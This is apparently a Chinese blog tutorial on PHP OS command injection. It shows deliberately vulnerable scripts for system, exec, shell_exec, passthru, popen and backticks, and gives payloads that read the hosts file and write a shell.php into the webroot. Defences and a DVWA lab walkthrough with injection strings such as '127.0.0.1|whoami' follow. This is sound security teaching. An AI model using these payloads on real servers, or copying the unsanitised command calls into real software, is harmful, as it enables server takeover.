目录

OS命令注入

原理以及成因

漏洞危害

相关函数

1、system()

2、 exec()

3、shell_exec()  应用最广泛

4、passthru()

5、popen()

6、反引号

漏洞利用

1、查看系统文件

2、 显示当前路径(绝对路径)

3、 写文件

 防御方法

    DVWA     命令注入

 

OS命令注入

原理以及成因

    程序员使用脚本语言(比如PHP )开发应用程序过程中,脚本语言开发十分快速、简介,方便,但是也伴随着一些问题。比如说速度慢,或者无法接触系统底层,如果我们开发的应用,特别是企业级的一些应用需要去调用一些外部程序(系统命令或者exe等可执行文件)。当应用需要调用一些外部程序时就会用到一些系统命令的函数。
    应用在调用这些函数执行系统命令的时候,如果将用户的输入作为系统命令的参数拼接到命令行中,在没有过滤用户的输入的情况下,就会造成命令执行(也就是命令注入)漏洞 。
    1. 用户输入作为拼接
    2. 没有足够的过滤

漏洞危害

    1. 继承Web 服务器程序权限(Web 用户权限),去执行系统命令【通过web应用去执行系统命令,继承的是web用户的权限】
    2. 继承Web 服务器权限,读写文件
    3. 反弹Shell(服务器主动连接攻击方就是反弹shell)
    4. 控制整个网站
    5. 控制整个服务器

相关函数

1、system()

Java component注入配置文件信息 java os命令注入_服务器

Java component注入配置文件信息 java os命令注入_服务器_02

system() 能够将字符串作为OS 命令执行,自带输出功能。测试代码如下

----system.php
 <meta charset='gb2312'>
 <?php
 if(isset($_GET['cmd'])){
     echo "<pre>";
     system($_GET['cmd']);
 }else{
     echo"
     ?cmd=ipconfig
     ";
 }
 ?>


----

 

2、 exec()

    exec() 函数能将字符串作为OS 命令执行,需要输出执行结果

Java component注入配置文件信息 java os命令注入_服务器_03

测试代码如下

----exec.php
 <meta charset="gb2312">
 <?php
 if(isset($_GET['cmd'])){
     echo "<pre>";
     print exec($_GET['cmd']);
 }else{
     echo"
     ?cmd=whoami
     ";
 }
 ?>
 ----


 

3、shell_exec()  应用最广泛

也需要print

Java component注入配置文件信息 java os命令注入_php_04

Java component注入配置文件信息 java os命令注入_系统命令_05


    测试代码如下

----shell_exec.php
  <?php
 if(isset($_GET['cmd'])){
     print shell_exec($_GET['cmd']);
 }else{
     echo"?cmd=whoami";
 }
 ?>
 ----

 

4、passthru()

Java component注入配置文件信息 java os命令注入_php_06

自带输出

测试代码如下
 ----passthru.php
 <?php
 if(isset($_GET['cmd'])){
     passthru($_GET['cmd']);
 }else{
     echo"?cmd=whoami";
 }
 ?>
 ----

 

5、popen()

    popen() 也能够执行OS 命令,但是该函数命令执行结果并不会返回结果,而是返回一个文件指针。无论返回什么,我们关心的是命令执行了

也就是说,我们在写这些命令的时候,我们需要把它文件的执行结果导入到一个文件中

Java component注入配置文件信息 java os命令注入_服务器_07

打开1.txt

Java component注入配置文件信息 java os命令注入_服务器_08


    测试代码如下

----popen.php
 <?php
 if(isset($_GET['cmd'])){
     $cmd=$_GET['cmd'].">> 1.txt";
     popen($cmd,'r');
 }else{
     echo"?cmd=whoami";
 }
 ?>
 ----

    查看1.txt 文件

 

6、反引号

不叫函数,叫一种语言结构
    反引号[``] 内的字符串,也会被解析成OS 命令。

Java component注入配置文件信息 java os命令注入_php_09


    测试代码如下

-----------------------------------------------------------------

<?php
 if(isset($_GET['cmd'])){
     $cmd=$_GET['cmd'];
     print `$cmd`;
 }else{
     echo"?cmd=whoami";
 }
 ?>

-----------------------------------------------------------------

 

漏洞利用

    OS 命令注入漏洞,攻击者直接继承Web 用户权限,在服务器上执行任意命令,危害特别大。以下命令均在windows 系统下测试成功。

利用方法:

1、查看系统文件

    提交参数[?cmd=type c:\windows\system32\drivers\etc\hosts],查看系统hosts 文件。(type是查看文件的dos命令)

2、 显示当前路径(绝对路径)

    提交参数[?cmd=cd]

3、 写文件

    提交参数[?cmd=echo "<?php phpinfo();?>" > C:\phpStudy\WWW\Commmandi\shell.php]
 
    页面没有报错,说明文件写入成功。访问shell.php 文件。

 
防御方法

    1. 尽量减少命令执行函数的使用,并在disable_functions 中禁用(在php.ini中)
    2. 在进入命令执行的函数或方法之前,对参数进行过滤
    3. 参数的值尽量使用引号包裹,并在拼接前调用addslashes 进行转义

Java component注入配置文件信息 java os命令注入_服务器_10

Java component注入配置文件信息 java os命令注入_服务器_11

DVWA     命令注入

我在本机的wamp下搭建了

http://127.0.0.1/DVWA-master/index.php  进入界面
默认账号为: admin,默认密码为: password:

Java component注入配置文件信息 java os命令注入_php_12

Java component注入配置文件信息 java os命令注入_服务器_13

Java component注入配置文件信息 java os命令注入_php_14


Java component注入配置文件信息 java os命令注入_服务器_15

我们这么去执行自己想要的命令呢?把前面的ping命令和谐
在框中输入127.0.0.1 | whoami

Java component注入配置文件信息 java os命令注入_系统命令_16

调成中级难度:

Java component注入配置文件信息 java os命令注入_服务器_17

Java component注入配置文件信息 java os命令注入_php_18

high级别

代码审计

Java component注入配置文件信息 java os命令注入_系统命令_19

找到命令注入 

low
    127.0.0.1| whoami
    127.0.0.1|whoami
    127.0.0.1&&whoami
    127.0.0.1;whoami            ?
    127.0.0.0.1||whoami   前面的命令执行失败后去执行后面
    
medium
    127.0.0.1| whoami
    127.0.0.1|whoami
    127.0.0.0.1||whoami
     127.0.0.1&&&&whoami (双写)           x
 
high

127.0.0.1|whoami